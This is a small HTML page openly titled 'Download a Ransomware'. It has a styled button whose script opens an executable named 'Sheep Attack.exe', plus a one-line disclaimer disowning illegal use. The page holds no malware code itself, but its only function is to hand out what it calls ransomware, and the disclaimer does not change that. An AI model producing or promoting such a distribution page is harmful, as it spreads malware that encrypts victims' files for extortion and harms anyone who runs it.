<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Download a Ransomware</title>
    <style>
    .button {
      min-width: 250px;
      height: 125px;
      color: #fff;
      padding: 5px 10px;
      font-weight: bold;
      cursor: pointer;
      transition: all 0.3s ease;
      position: relative;
      display: inline-block;
      outline: none;
      border-radius: 5px;
      border: none;
      background-size: 120% auto;
      background-image: linear-gradient(315deg, #43cea2 0%, #185a9d 75%);
    }
    .button:hover {
      background-position: right center;
    }
    .button:active {
      top: 2px;
    }
    </style>
</head>
<body>
<script>
    function Download(){
        window.open("Sheep Attack.exe");
    }
</script>
<p> </p>
<p> </p>
<input type = "button" value = "Click Me For Download a Ransomware" class = "button" onclick="Download()">
<a>This website won't have any thing to do for you if you do something illegally</a>
</body>
</html>
